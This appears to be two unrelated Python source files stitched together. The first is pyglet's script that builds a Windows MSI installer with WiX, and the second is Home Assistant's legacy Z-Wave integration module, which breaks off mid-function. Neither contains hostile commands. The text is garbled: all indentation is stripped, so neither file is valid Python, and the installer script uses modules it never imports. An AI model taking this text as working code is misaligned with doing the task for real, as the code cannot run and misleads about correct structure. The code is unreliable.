import pkg_resources
class PythonVersion(object):
def __init__(self, version, key_root, display_version):
self.version = version
self.display_version = display_version
self.id = 'PY' + version.replace('.', '') + key_root
self.key_root = key_root
self.key = r'SOFTWARE\Python\PythonCore\%s\InstallPath' % version
self.dir_prop = 'PYTHONHOME%s' % self.id
self.exe_prop = 'PYTHONEXE%s' % self.id
self.components = []
PYTHON_VERSIONS = (
PythonVersion('2.4', 'HKLM', 'Python 2.4'),
PythonVersion('2.5', 'HKLM', 'Python 2.5'),
PythonVersion('2.6', 'HKLM', 'Python 2.6'),
PythonVersion('2.4', 'HKCU', 'Python 2.4 (current user only)'),
PythonVersion('2.5', 'HKCU', 'Python 2.5 (current user only)'),
PythonVersion('2.6', 'HKCU', 'Python 2.6 (current user only)'),
)
MISSING_PYTHON_MESSAGE = 'pyglet requires Python 2.4 or later. The ' \
'installation will be aborted.'
exclude_packages = []
ids = set()
def id(name):
num = 1
id = name
while id in ids:
num += 1
id = '%s%d' % (name, num)
ids.add(id)
return id
shortnames = set()
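# Generate a unique DOS-style 8.3 short name for the MSI file table, appending
# a counter when the truncated name collides with one already used.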
def shortname(name, ext):
num = 1
shortname = '%s.%s' % (name[:8], ext)
while shortname in shortnames:
num += 1
shortname = '%s%02d.%s' % (name[:6], num, ext)
shortnames.add(shortname)
return shortname
def node(doc, node_name, **kwargs):
node = doc.createElement(node_name)
for key, value in kwargs.items():
node.setAttribute(key, value)
return node
def add_package(name, src_dir, doc, dest_node, pyver):
if name in exclude_packages:
return
src_path = os.path.join(src_dir, name)
directory = node(doc, 'Directory',
Id=id('%sDir' % name),
Name=name)
dest_node.appendChild(doc.createTextNode('\n\n'))
dest_node.appendChild(directory)
dest_node.appendChild(doc.createTextNode('\n\n'))
directory.appendChild(doc.createTextNode('\n'))
for filename in os.listdir(src_path):
file_path = os.path.join(src_path, filename)
if os.path.isdir(file_path):
if os.path.exists(os.path.join(file_path, '__init__.py')):
add_package(filename, src_path, doc, directory, pyver)
elif filename.endswith('.py'):
add_module(filename, src_path, doc, directory, pyver)
def component_id(name, pyver):
component = id(name)
pyver.components.append(component)
return component
guid_seq = 0
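# Each WiX <Component> below gets its own GUID; bumping clock_seq on every
# call keeps the uuid1() values distinct even within the same clock tick.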
def guid():
global guid_seq
guid_seq += 1
return uuid1(clock_seq=guid_seq).hex.upper()
def add_module(name, src_dir, doc, dest_node, pyver):
src_path = os.path.join(src_dir, name)
basefile = os.path.splitext(name)[0]
component = node(doc, 'Component',
Id= component_id('%sComponent' % basefile, pyver),
Guid=guid())
component.appendChild(
node(doc, 'File',
Id=id('%sPy' % basefile),
Name=name,
DiskId='1',
Source=src_path))
component.appendChild(
node(doc, 'RemoveFile',
Id=id('%sPyc' % basefile),
Name='%s.pyc' % basefile,
On='uninstall'))
component.appendChild(
node(doc, 'RemoveFile',
Id=id('%sPyo' % basefile),
Name='%s.pyo' % basefile,
On='uninstall'))
dest_node.appendChild(component)
# Some readability
dest_node.appendChild(doc.createTextNode('\n'))
def call(cmd):
print cmd
return subprocess.call(cmd, shell=True)
if __name__ == '__main__':
script_dir = os.path.dirname(__file__)
root_dir = os.path.join(script_dir, '../..')
dist_dir = os.path.join(root_dir, 'dist')
try:
os.makedirs(dist_dir)
except OSError:
pass
# Copy current avbin into res
shutil.copyfile('c:/windows/system32/avbin.dll',
os.path.join(script_dir, 'res', 'avbin.dll'))
# Determine release version from setup.py
version_re = re.compile("VERSION = '([^']*)'")
for line in open(os.path.join(root_dir, 'setup.py')):
match = version_re.match(line)
if match:
version = match.groups()[0]
# Create a Windows-friendly dotted number for the version
# Version string must not have any letters, so use:
# alpha = x.x.x.(0 + alpha num)
# beta = x.x.x.(16 + beta num)
# rc = x.x.x.(32 + rc num)
    # release = x.x.x.128
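    # Worked examples of this scheme (editor's note): '1.1.2rc1' maps to the
    # Windows version 1.1.2.33 (32 + 1), and a final release '1.1' maps to
    # 1.1.0.128.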
parts = list(pkg_resources.parse_version(version))
major = int(parts.pop(0))
minor = patch = tagnum = 0
if parts[0][0] != '*':
minor = int(parts.pop(0))
if parts[0][0] != '*':
patch = int(parts.pop(0))
tag = parts.pop(0)
if tag == '*alpha':
base = 0
elif tag == '*beta':
base = 16
elif tag == '*rc':
base = 32
elif tag == '*final':
base = 128
else:
assert False, 'Unrecognised version tag "%s"' % tag
if parts and parts[0][0] != '*':
tagnum = int(parts.pop(0))
assert not parts or parts[0] == '*final'
version_windows = '%d.%d.%d.%d' % (major, minor, patch, base + tagnum)
print 'Version %s is Windows version %s' % (version, version_windows)
print 'Writing pyglet.wxs'
# Open template wxs and find Product element
wxs = parse(os.path.join(script_dir, 'pyglet.in.wxs'))
Product = wxs.getElementsByTagName('Product')[0]
Product.setAttribute('Version', version_windows)
# Add Python discovery
for pyver in PYTHON_VERSIONS:
Property = node(wxs, 'Property',
Id=pyver.dir_prop)
Property.appendChild(
node(wxs, 'RegistrySearch',
Id='%sRegSearch' % pyver.dir_prop,
Root=pyver.key_root,
Key=pyver.key,
Type='directory'))
Product.appendChild(Property)
# Add install conditional on at least one Python version present.
Condition = node(wxs, 'Condition',
Message=MISSING_PYTHON_MESSAGE)
Condition.appendChild(wxs.createTextNode(
' or '.join([pyver.dir_prop for pyver in PYTHON_VERSIONS])))
Product.appendChild(Condition)
# Get TARGETDIR Directory element
for elem in wxs.getElementsByTagName('Directory'):
if elem.getAttribute('Id') == 'TARGETDIR':
target_dir = elem
break
# Create entire set of components for each python version (WiX 3 will
# ensure only one copy of the source file is in the archive)
for pyver in PYTHON_VERSIONS:
python_home = node(wxs, 'Directory',
Id=pyver.dir_prop)
target_dir.appendChild(python_home)
lib_dir = node(wxs, 'Directory',
Id='%sLibDir' % pyver.dir_prop,
Name='Lib')
python_home.appendChild(lib_dir)
site_packages = node(wxs, 'Directory',
Id='%sSitePackages' % pyver.dir_prop,
Name='site-packages')
lib_dir.appendChild(site_packages)
add_package('pyglet', root_dir, wxs, site_packages, pyver)
# Add all components to features
RuntimeFeature = wxs.getElementsByTagName('Feature')[0]
for pyver in PYTHON_VERSIONS:
feature = node(wxs, 'Feature',
Id='RuntimeFeature%s' % pyver.id,
Title='pyglet runtime for %s' % pyver.display_version,
Level='1',
AllowAdvertise='no')
condition = node(wxs, 'Condition',
Level='0')
condition.appendChild(wxs.createTextNode('NOT ' + pyver.dir_prop))
feature.appendChild(condition)
for component in pyver.components:
feature.appendChild(node(wxs, 'ComponentRef',
Id=component))
feature.appendChild(wxs.createTextNode('\n'))
RuntimeFeature.appendChild(feature)
# Add byte compilation custom actions
last_action = 'InstallFinalize'
InstallExecuteSequence = \
wxs.getElementsByTagName('InstallExecuteSequence')[0]
UI = wxs.getElementsByTagName('UI')[0]
for pyver in PYTHON_VERSIONS:
# Actions are conditional on the feature being installed
def cond(node):
node.appendChild(wxs.createTextNode(
'(&RuntimeFeature%s=3) AND NOT(!RuntimeFeature%s=3)' % (
pyver.id, pyver.id)))
return node
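        # (Assumed Windows Installer semantics for the condition above:
        # "&Feature" is the feature's requested action state and "!Feature"
        # its currently installed state, with 3 == INSTALLSTATE_LOCAL, so the
        # condition reads "about to be installed locally and not already
        # installed locally".)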
# Define the actions
Product.appendChild(node(wxs, 'CustomAction',
Id='SetPythonExe%s' % pyver.id,
Property=pyver.exe_prop,
Value=r'[%s]\pythonw.exe' % pyver.dir_prop))
Product.appendChild(node(wxs, 'CustomAction',
Id='ByteCompile%s' % pyver.id,
Property=pyver.exe_prop,
ExeCommand=r'-c "import compileall; compileall.compile_dir(\"[%s]\Lib\site-packages\pyglet\", force=1)"' % pyver.dir_prop,
Return='ignore'))
Product.appendChild(node(wxs, 'CustomAction',
Id='ByteOptimize%s' % pyver.id,
Property=pyver.exe_prop,
ExeCommand=r'-OO -c "import compileall; compileall.compile_dir(\"[%s]\Lib\site-packages\pyglet\", force=1)"' % pyver.dir_prop,
Return='ignore'))
# Schedule execution of these actions
InstallExecuteSequence.appendChild(cond(
node(wxs, 'Custom',
Action='SetPythonExe%s' % pyver.id,
After=last_action)))
InstallExecuteSequence.appendChild(cond(
node(wxs, 'Custom',
Action='ByteCompile%s' % pyver.id,
After='SetPythonExe%s' % pyver.id)))
InstallExecuteSequence.appendChild(cond(
node(wxs, 'Custom',
Action='ByteOptimize%s' % pyver.id,
After='ByteCompile%s' % pyver.id)))
last_action = 'ByteOptimize%s' % pyver.id
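        # Net effect: for each Python version the chain
        # InstallFinalize -> SetPythonExe -> ByteCompile -> ByteOptimize is
        # appended to the execute sequence, with each version's chain
        # scheduled after the previous version's ByteOptimize action.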
# Set progress text for the actions
progress = node(wxs, 'ProgressText',
Action='ByteCompile%s' % pyver.id)
progress.appendChild(wxs.createTextNode(
'Byte-compiling modules for Python %s' % pyver.version))
UI.appendChild(progress)
progress = node(wxs, 'ProgressText',
Action='ByteOptimize%s' % pyver.id)
progress.appendChild(wxs.createTextNode(
'Byte-optimizing modules for Python %s' % pyver.version))
UI.appendChild(progress)
# Write wxs file
wxs.writexml(open(os.path.join(script_dir, 'pyglet.wxs'), 'w'))
# Compile
call('candle -out %s %s' % (os.path.join(script_dir, 'pyglet.wixobj'),
os.path.join(script_dir, 'pyglet.wxs')))
# Link
call('light -sval -out %s %s' % \
(os.path.join(dist_dir, 'pyglet-%s.msi' % version),
os.path.join(script_dir, 'pyglet.wixobj')))
|
|
"""Support for Z-Wave."""
# pylint: disable=import-outside-toplevel
import asyncio
import copy
from importlib import import_module
import logging
from pprint import pprint
import voluptuous as vol
from homeassistant import config_entries
from homeassistant.const import (
ATTR_ENTITY_ID,
ATTR_NAME,
EVENT_HOMEASSISTANT_START,
EVENT_HOMEASSISTANT_STOP,
)
from homeassistant.core import CoreState, callback
from homeassistant.helpers import discovery
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.device_registry import (
async_get_registry as async_get_device_registry,
)
from homeassistant.helpers.dispatcher import (
async_dispatcher_connect,
async_dispatcher_send,
)
from homeassistant.helpers.entity import generate_entity_id
from homeassistant.helpers.entity_component import DEFAULT_SCAN_INTERVAL
from homeassistant.helpers.entity_platform import EntityPlatform
from homeassistant.helpers.entity_registry import (
async_entries_for_config_entry,
async_get_registry as async_get_entity_registry,
)
from homeassistant.helpers.entity_values import EntityValues
from homeassistant.helpers.event import async_track_time_change
from homeassistant.util import convert
import homeassistant.util.dt as dt_util
from . import const, websocket_api as wsapi, workaround
from .const import (
CONF_AUTOHEAL,
CONF_CONFIG_PATH,
CONF_DEBUG,
CONF_NETWORK_KEY,
CONF_POLLING_INTERVAL,
CONF_USB_STICK_PATH,
DATA_DEVICES,
DATA_ENTITY_VALUES,
DATA_NETWORK,
DATA_ZWAVE_CONFIG,
DEFAULT_CONF_AUTOHEAL,
DEFAULT_CONF_USB_STICK_PATH,
DEFAULT_DEBUG,
DEFAULT_POLLING_INTERVAL,
DOMAIN,
)
from .discovery_schemas import DISCOVERY_SCHEMAS
from .node_entity import ZWaveBaseEntity, ZWaveNodeEntity
from .util import (
check_has_unique_id,
check_node_schema,
check_value_schema,
is_node_parsed,
node_device_id_and_name,
node_name,
)
_LOGGER = logging.getLogger(__name__)
CLASS_ID = "class_id"
ATTR_POWER = "power_consumption"
CONF_POLLING_INTENSITY = "polling_intensity"
CONF_IGNORED = "ignored"
CONF_INVERT_OPENCLOSE_BUTTONS = "invert_openclose_buttons"
CONF_INVERT_PERCENT = "invert_percent"
CONF_REFRESH_VALUE = "refresh_value"
CONF_REFRESH_DELAY = "delay"
CONF_DEVICE_CONFIG = "device_config"
CONF_DEVICE_CONFIG_GLOB = "device_config_glob"
CONF_DEVICE_CONFIG_DOMAIN = "device_config_domain"
DATA_ZWAVE_CONFIG_YAML_PRESENT = "zwave_config_yaml_present"
DEFAULT_CONF_IGNORED = False
DEFAULT_CONF_INVERT_OPENCLOSE_BUTTONS = False
DEFAULT_CONF_INVERT_PERCENT = False
DEFAULT_CONF_REFRESH_VALUE = False
DEFAULT_CONF_REFRESH_DELAY = 5
PLATFORMS = [
"binary_sensor",
"climate",
"cover",
"fan",
"lock",
"light",
"sensor",
"switch",
]
RENAME_NODE_SCHEMA = vol.Schema(
{
vol.Required(const.ATTR_NODE_ID): vol.Coerce(int),
vol.Required(ATTR_NAME): cv.string,
vol.Optional(const.ATTR_UPDATE_IDS, default=False): cv.boolean,
}
)
RENAME_VALUE_SCHEMA = vol.Schema(
{
vol.Required(const.ATTR_NODE_ID): vol.Coerce(int),
vol.Required(const.ATTR_VALUE_ID): vol.Coerce(int),
vol.Required(ATTR_NAME): cv.string,
vol.Optional(const.ATTR_UPDATE_IDS, default=False): cv.boolean,
}
)
SET_CONFIG_PARAMETER_SCHEMA = vol.Schema(
{
vol.Required(const.ATTR_NODE_ID): vol.Coerce(int),
vol.Required(const.ATTR_CONFIG_PARAMETER): vol.Coerce(int),
vol.Required(const.ATTR_CONFIG_VALUE): vol.Any(vol.Coerce(int), cv.string),
vol.Optional(const.ATTR_CONFIG_SIZE, default=2): vol.Coerce(int),
}
)
SET_NODE_VALUE_SCHEMA = vol.Schema(
{
vol.Required(const.ATTR_NODE_ID): vol.Coerce(int),
vol.Required(const.ATTR_VALUE_ID): vol.Any(vol.Coerce(int), cv.string),
vol.Required(const.ATTR_CONFIG_VALUE): vol.Any(vol.Coerce(int), cv.string),
}
)
REFRESH_NODE_VALUE_SCHEMA = vol.Schema(
{
vol.Required(const.ATTR_NODE_ID): vol.Coerce(int),
vol.Required(const.ATTR_VALUE_ID): vol.Coerce(int),
}
)
SET_POLL_INTENSITY_SCHEMA = vol.Schema(
{
vol.Required(const.ATTR_NODE_ID): vol.Coerce(int),
vol.Required(const.ATTR_VALUE_ID): vol.Coerce(int),
vol.Required(const.ATTR_POLL_INTENSITY): vol.Coerce(int),
}
)
PRINT_CONFIG_PARAMETER_SCHEMA = vol.Schema(
{
vol.Required(const.ATTR_NODE_ID): vol.Coerce(int),
vol.Required(const.ATTR_CONFIG_PARAMETER): vol.Coerce(int),
}
)
NODE_SERVICE_SCHEMA = vol.Schema({vol.Required(const.ATTR_NODE_ID): vol.Coerce(int)})
REFRESH_ENTITY_SCHEMA = vol.Schema({vol.Required(ATTR_ENTITY_ID): cv.entity_id})
RESET_NODE_METERS_SCHEMA = vol.Schema(
{
vol.Required(const.ATTR_NODE_ID): vol.Coerce(int),
vol.Optional(const.ATTR_INSTANCE, default=1): vol.Coerce(int),
}
)
CHANGE_ASSOCIATION_SCHEMA = vol.Schema(
{
vol.Required(const.ATTR_ASSOCIATION): cv.string,
vol.Required(const.ATTR_NODE_ID): vol.Coerce(int),
vol.Required(const.ATTR_TARGET_NODE_ID): vol.Coerce(int),
vol.Required(const.ATTR_GROUP): vol.Coerce(int),
vol.Optional(const.ATTR_INSTANCE, default=0x00): vol.Coerce(int),
}
)
SET_WAKEUP_SCHEMA = vol.Schema(
{
vol.Required(const.ATTR_NODE_ID): vol.Coerce(int),
vol.Required(const.ATTR_CONFIG_VALUE): vol.All(
vol.Coerce(int), cv.positive_int
),
}
)
HEAL_NODE_SCHEMA = vol.Schema(
{
vol.Required(const.ATTR_NODE_ID): vol.Coerce(int),
vol.Optional(const.ATTR_RETURN_ROUTES, default=False): cv.boolean,
}
)
TEST_NODE_SCHEMA = vol.Schema(
{
vol.Required(const.ATTR_NODE_ID): vol.Coerce(int),
vol.Optional(const.ATTR_MESSAGES, default=1): cv.positive_int,
}
)
DEVICE_CONFIG_SCHEMA_ENTRY = vol.Schema(
{
vol.Optional(CONF_POLLING_INTENSITY): cv.positive_int,
vol.Optional(CONF_IGNORED, default=DEFAULT_CONF_IGNORED): cv.boolean,
vol.Optional(
CONF_INVERT_OPENCLOSE_BUTTONS, default=DEFAULT_CONF_INVERT_OPENCLOSE_BUTTONS
): cv.boolean,
vol.Optional(
CONF_INVERT_PERCENT, default=DEFAULT_CONF_INVERT_PERCENT
): cv.boolean,
vol.Optional(
CONF_REFRESH_VALUE, default=DEFAULT_CONF_REFRESH_VALUE
): cv.boolean,
vol.Optional(
CONF_REFRESH_DELAY, default=DEFAULT_CONF_REFRESH_DELAY
): cv.positive_int,
}
)
SIGNAL_REFRESH_ENTITY_FORMAT = "zwave_refresh_entity_{}"
CONFIG_SCHEMA = vol.Schema(
{
DOMAIN: vol.Schema(
{
vol.Optional(CONF_AUTOHEAL, default=DEFAULT_CONF_AUTOHEAL): cv.boolean,
vol.Optional(CONF_CONFIG_PATH): cv.string,
vol.Optional(CONF_NETWORK_KEY): vol.All(
cv.string, vol.Match(r"(0x\w\w,\s?){15}0x\w\w")
),
vol.Optional(CONF_DEVICE_CONFIG, default={}): vol.Schema(
{cv.entity_id: DEVICE_CONFIG_SCHEMA_ENTRY}
),
vol.Optional(CONF_DEVICE_CONFIG_GLOB, default={}): vol.Schema(
{cv.string: DEVICE_CONFIG_SCHEMA_ENTRY}
),
vol.Optional(CONF_DEVICE_CONFIG_DOMAIN, default={}): vol.Schema(
{cv.string: DEVICE_CONFIG_SCHEMA_ENTRY}
),
vol.Optional(CONF_DEBUG, default=DEFAULT_DEBUG): cv.boolean,
vol.Optional(
CONF_POLLING_INTERVAL, default=DEFAULT_POLLING_INTERVAL
): cv.positive_int,
vol.Optional(CONF_USB_STICK_PATH): cv.string,
}
)
},
extra=vol.ALLOW_EXTRA,
)
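# Illustrative configuration.yaml entry matching CONFIG_SCHEMA above
# (all values are made up):
#
#   zwave:
#     usb_path: /dev/ttyACM0
#     network_key: "0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f, 0x10"
#     polling_interval: 60000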
async def async_get_ozw_migration_data(hass):
"""Return dict with info for migration to ozw integration."""
data_to_migrate = {}
zwave_config_entries = hass.config_entries.async_entries(DOMAIN)
if not zwave_config_entries:
_LOGGER.error("Config entry not set up")
return data_to_migrate
if hass.data.get(DATA_ZWAVE_CONFIG_YAML_PRESENT):
_LOGGER.warning(
"Remove %s from configuration.yaml "
"to avoid setting up this integration on restart "
"after completing migration to ozw",
DOMAIN,
)
config_entry = zwave_config_entries[0] # zwave only has a single config entry
ent_reg = await async_get_entity_registry(hass)
entity_entries = async_entries_for_config_entry(ent_reg, config_entry.entry_id)
unique_entries = {entry.unique_id: entry for entry in entity_entries}
dev_reg = await async_get_device_registry(hass)
for entity_values in hass.data[DATA_ENTITY_VALUES]:
node = entity_values.primary.node
unique_id = compute_value_unique_id(node, entity_values.primary)
if unique_id not in unique_entries:
continue
device_identifier, _ = node_device_id_and_name(
node, entity_values.primary.instance
)
device_entry = dev_reg.async_get_device({device_identifier}, set())
data_to_migrate[unique_id] = {
"node_id": node.node_id,
"node_instance": entity_values.primary.instance,
"device_id": device_entry.id,
"command_class": entity_values.primary.command_class,
"command_class_label": entity_values.primary.label,
"value_index": entity_values.primary.index,
"unique_id": unique_id,
"entity_entry": unique_entries[unique_id],
}
return data_to_migrate
@callback
def async_is_ozw_migrated(hass):
"""Return True if migration to ozw is done."""
ozw_config_entries = hass.config_entries.async_entries("ozw")
if not ozw_config_entries:
return False
ozw_config_entry = ozw_config_entries[0] # only one ozw entry is allowed
migrated = bool(ozw_config_entry.data.get("migrated"))
return migrated
def _obj_to_dict(obj):
"""Convert an object into a hash for debug."""
return {
key: getattr(obj, key)
for key in dir(obj)
if key[0] != "_" and not callable(getattr(obj, key))
}
def _value_name(value):
"""Return the name of the value."""
return f"{node_name(value.node)} {value.label}".strip()
def nice_print_node(node):
"""Print a nice formatted node to the output (debug method)."""
node_dict = _obj_to_dict(node)
node_dict["values"] = {
value_id: _obj_to_dict(value) for value_id, value in node.values.items()
}
_LOGGER.info("FOUND NODE %s \n%s", node.product_name, node_dict)
def get_config_value(node, value_index, tries=5):
"""Return the current configuration value for a specific index."""
try:
for value in node.values.values():
if (
value.command_class == const.COMMAND_CLASS_CONFIGURATION
and value.index == value_index
):
return value.data
except RuntimeError:
        # If we get a runtime error, the dict has changed while
        # we were looking for a value, so just try again
return (
None if tries <= 0 else get_config_value(node, value_index, tries=tries - 1)
)
return None
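# Illustrative usage: get_config_value(node, 3) walks the node's
# COMMAND_CLASS_CONFIGURATION values and returns the data of the value whose
# index is 3, retrying a handful of times (controlled by `tries`) if the
# values dict mutates underneath us, or None if the parameter is not found.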
async def async_setup_platform(hass, config, async_add_entities, discovery_info=None):
"""Set up the Z-Wave platform (generic part)."""
if discovery_info is None or DATA_NETWORK not in hass.data:
return False
device = hass.data[DATA_DEVICES].get(discovery_info[const.DISCOVERY_DEVICE])
if device is None:
return False
async_add_entities([device])
return True
async def async_setup(hass, config):
"""Set up Z-Wave components."""
if DOMAIN not in config:
return True
conf = config[DOMAIN]
hass.data[DATA_ZWAVE_CONFIG] = conf
hass.data[DATA_ZWAVE_CONFIG_YAML_PRESENT] = True
if not hass.config_entries.async_entries(DOMAIN):
hass.async_create_task(
hass.config_entries.flow.async_init(
DOMAIN,
context={"source": config_entries.SOURCE_IMPORT},
data={
CONF_USB_STICK_PATH: conf.get(
CONF_USB_STICK_PATH, DEFAULT_CONF_USB_STICK_PATH
),
CONF_NETWORK_KEY: conf.get(CONF_NETWORK_KEY),
},
)
)
return True
async def async_setup_entry(hass, config_entry):
"""Set up Z-Wave from a config entry.
Will automatically load components to support devices found on the network.
"""
    # pylint: disable=import-error
    from openzwave.group import ZWaveGroup
from openzwave.network import ZWaveNetwork
from openzwave.option import ZWaveOption
# pylint: enable=import-error
from pydispatch import dispatcher
if async_is_ozw_migrated(hass):
_LOGGER.error(
"Migration to ozw has been done. Please remove the zwave integration"
)
return False
# Merge config entry and yaml config
config = config_entry.data
if DATA_ZWAVE_CONFIG in hass.data:
config = {**config, **hass.data[DATA_ZWAVE_CONFIG]}
# Update hass.data with merged config so we can access it elsewhere
hass.data[DATA_ZWAVE_CONFIG] = config
# Load configuration
use_debug = config.get(CONF_DEBUG, DEFAULT_DEBUG)
autoheal = config.get(CONF_AUTOHEAL, DEFAULT_CONF_AUTOHEAL)
device_config = EntityValues(
config.get(CONF_DEVICE_CONFIG),
config.get(CONF_DEVICE_CONFIG_DOMAIN),
config.get(CONF_DEVICE_CONFIG_GLOB),
)
usb_path = config[CONF_USB_STICK_PATH]
_LOGGER.info("Z-Wave USB path is %s", usb_path)
# Setup options
options = ZWaveOption(
usb_path,
user_path=hass.config.config_dir,
config_path=config.get(CONF_CONFIG_PATH),
)
options.set_console_output(use_debug)
if config.get(CONF_NETWORK_KEY):
options.addOption("NetworkKey", config[CONF_NETWORK_KEY])
await hass.async_add_executor_job(options.lock)
network = hass.data[DATA_NETWORK] = ZWaveNetwork(options, autostart=False)
hass.data[DATA_DEVICES] = {}
hass.data[DATA_ENTITY_VALUES] = []
registry = await async_get_entity_registry(hass)
wsapi.async_load_websocket_api(hass)
if use_debug: # pragma: no cover
def log_all(signal, value=None):
"""Log all the signals."""
print("")
print("SIGNAL *****", signal)
if value and signal in (
ZWaveNetwork.SIGNAL_VALUE_CHANGED,
ZWaveNetwork.SIGNAL_VALUE_ADDED,
ZWaveNetwork.SIGNAL_SCENE_EVENT,
ZWaveNetwork.SIGNAL_NODE_EVENT,
ZWaveNetwork.SIGNAL_AWAKE_NODES_QUERIED,
ZWaveNetwork.SIGNAL_ALL_NODES_QUERIED,
ZWaveNetwork.SIGNAL_ALL_NODES_QUERIED_SOME_DEAD,
):
pprint(_obj_to_dict(value))
print("")
dispatcher.connect(log_all, weak=False)
def value_added(node, value):
"""Handle new added value to a node on the network."""
# Check if this value should be tracked by an existing entity
for values in hass.data[DATA_ENTITY_VALUES]:
values.check_value(value)
for schema in DISCOVERY_SCHEMAS:
if not check_node_schema(node, schema):
continue
if not check_value_schema(
value, schema[const.DISC_VALUES][const.DISC_PRIMARY]
):
continue
values = ZWaveDeviceEntityValues(
hass, schema, value, config, device_config, registry
)
# We create a new list and update the reference here so that
# the list can be safely iterated over in the main thread
new_values = hass.data[DATA_ENTITY_VALUES] + [values]
hass.data[DATA_ENTITY_VALUES] = new_values
platform = EntityPlatform(
hass=hass,
logger=_LOGGER,
domain=DOMAIN,
platform_name=DOMAIN,
platform=None,
scan_interval=DEFAULT_SCAN_INTERVAL,
entity_namespace=None,
)
platform.config_entry = config_entry
def node_added(node):
"""Handle a new node on the network."""
entity = ZWaveNodeEntity(node, network)
async def _add_node_to_component():
if hass.data[DATA_DEVICES].get(entity.unique_id):
return
name = node_name(node)
generated_id = generate_entity_id(DOMAIN + ".{}", name, [])
node_config = device_config.get(generated_id)
if node_config.get(CONF_IGNORED):
_LOGGER.info(
"Ignoring node entity %s due to device settings", generated_id
)
return
hass.data[DATA_DEVICES][entity.unique_id] = entity
await platform.async_add_entities([entity])
if entity.unique_id:
hass.async_add_job(_add_node_to_component())
return
@callback
def _on_ready(sec):
_LOGGER.info("Z-Wave node %d ready after %d seconds", entity.node_id, sec)
hass.async_add_job(_add_node_to_component)
@callback
def _on_timeout(sec):
_LOGGER.warning(
"Z-Wave node %d not ready after %d seconds, continuing anyway",
entity.node_id,
sec,
)
hass.async_add_job(_add_node_to_component)
hass.add_job(check_has_unique_id, entity, _on_ready, _on_timeout)
def node_removed(node):
node_id = node.node_id
node_key = f"node-{node_id}"
for key in list(hass.data[DATA_DEVICES]):
if key is None:
continue
if not key.startswith(f"{node_id}-"):
continue
entity = hass.data[DATA_DEVICES][key]
_LOGGER.debug(
"Removing Entity - value: %s - entity_id: %s", key, entity.entity_id
)
hass.add_job(entity.node_removed())
del hass.data[DATA_DEVICES][key]
entity = hass.data[DATA_DEVICES][node_key]
hass.add_job(entity.node_removed())
del hass.data[DATA_DEVICES][node_key]
hass.add_job(_remove_device(node))
async def _remove_device(node):
dev_reg = await async_get_device_registry(hass)
identifier, name = node_device_id_and_name(node)
device = dev_reg.async_get_device(identifiers={identifier})
if device is not None:
_LOGGER.debug("Removing Device - %s - %s", device.id, name)
dev_reg.async_remove_device(device.id)
def network_ready():
"""Handle the query of all awake nodes."""
_LOGGER.info(
"Z-Wave network is ready for use. All awake nodes "
"have been queried. Sleeping nodes will be "
"queried when they awake"
)
hass.bus.fire(const.EVENT_NETWORK_READY)
def network_complete():
"""Handle the querying of all nodes on network."""
_LOGGER.info(
"Z-Wave network is complete. All nodes on the network have been queried"
)
hass.bus.fire(const.EVENT_NETWORK_COMPLETE)
def network_complete_some_dead():
"""Handle the querying of all nodes on network."""
_LOGGER.info(
"Z-Wave network is complete. All nodes on the network "
"have been queried, but some nodes are marked dead"
)
hass.bus.fire(const.EVENT_NETWORK_COMPLETE_SOME_DEAD)
dispatcher.connect(value_added, ZWaveNetwork.SIGNAL_VALUE_ADDED, weak=False)
dispatcher.connect(node_added, ZWaveNetwork.SIGNAL_NODE_ADDED, weak=False)
dispatcher.connect(node_removed, ZWaveNetwork.SIGNAL_NODE_REMOVED, weak=False)
dispatcher.connect(
network_ready, ZWaveNetwork.SIGNAL_AWAKE_NODES_QUERIED, weak=False
)
dispatcher.connect(
network_complete, ZWaveNetwork.SIGNAL_ALL_NODES_QUERIED, weak=False
)
dispatcher.connect(
network_complete_some_dead,
ZWaveNetwork.SIGNAL_ALL_NODES_QUERIED_SOME_DEAD,
weak=False,
)
def add_node(service):
"""Switch into inclusion mode."""
_LOGGER.info("Z-Wave add_node have been initialized")
network.controller.add_node()
def add_node_secure(service):
"""Switch into secure inclusion mode."""
_LOGGER.info("Z-Wave add_node_secure have been initialized")
network.controller.add_node(True)
def remove_node(service):
"""Switch into exclusion mode."""
_LOGGER.info("Z-Wave remove_node have been initialized")
network.controller.remove_node()
def cancel_command(service):
"""Cancel a running controller command."""
_LOGGER.info("Cancel running Z-Wave command")
network.controller.cancel_command()
def heal_network(service):
"""Heal the network."""
_LOGGER.info("Z-Wave heal running")
network.heal()
def soft_reset(service):
"""Soft reset the controller."""
_LOGGER.info("Z-Wave soft_reset have been initialized")
network.controller.soft_reset()
def test_network(service):
"""Test the network by sending commands to all the nodes."""
_LOGGER.info("Z-Wave test_network have been initialized")
network.test()
def stop_network(_service_or_event):
"""Stop Z-Wave network."""
_LOGGER.info("Stopping Z-Wave network")
network.stop()
if hass.state == CoreState.running:
hass.bus.fire(const.EVENT_NETWORK_STOP)
async def rename_node(service):
"""Rename a node."""
node_id = service.data.get(const.ATTR_NODE_ID)
node = network.nodes[node_id] # pylint: disable=unsubscriptable-object
name = service.data.get(ATTR_NAME)
node.name = name
_LOGGER.info("Renamed Z-Wave node %d to %s", node_id, name)
update_ids = service.data.get(const.ATTR_UPDATE_IDS)
# We want to rename the device, the node entity,
# and all the contained entities
node_key = f"node-{node_id}"
entity = hass.data[DATA_DEVICES][node_key]
await entity.node_renamed(update_ids)
for key in list(hass.data[DATA_DEVICES]):
if not key.startswith(f"{node_id}-"):
continue
entity = hass.data[DATA_DEVICES][key]
await entity.value_renamed(update_ids)
async def rename_value(service):
"""Rename a node value."""
node_id = service.data.get(const.ATTR_NODE_ID)
value_id = service.data.get(const.ATTR_VALUE_ID)
node = network.nodes[node_id] # pylint: disable=unsubscriptable-object
value = node.values[value_id]
name = service.data.get(ATTR_NAME)
value.label = name
_LOGGER.info(
"Renamed Z-Wave value (Node %d Value %d) to %s", node_id, value_id, name
)
update_ids = service.data.get(const.ATTR_UPDATE_IDS)
value_key = f"{node_id}-{value_id}"
entity = hass.data[DATA_DEVICES][value_key]
await entity.value_renamed(update_ids)
def set_poll_intensity(service):
"""Set the polling intensity of a node value."""
node_id = service.data.get(const.ATTR_NODE_ID)
value_id = service.data.get(const.ATTR_VALUE_ID)
node = network.nodes[node_id] # pylint: disable=unsubscriptable-object
value = node.values[value_id]
intensity = service.data.get(const.ATTR_POLL_INTENSITY)
if intensity == 0:
if value.disable_poll():
_LOGGER.info("Polling disabled (Node %d Value %d)", node_id, value_id)
return
_LOGGER.info(
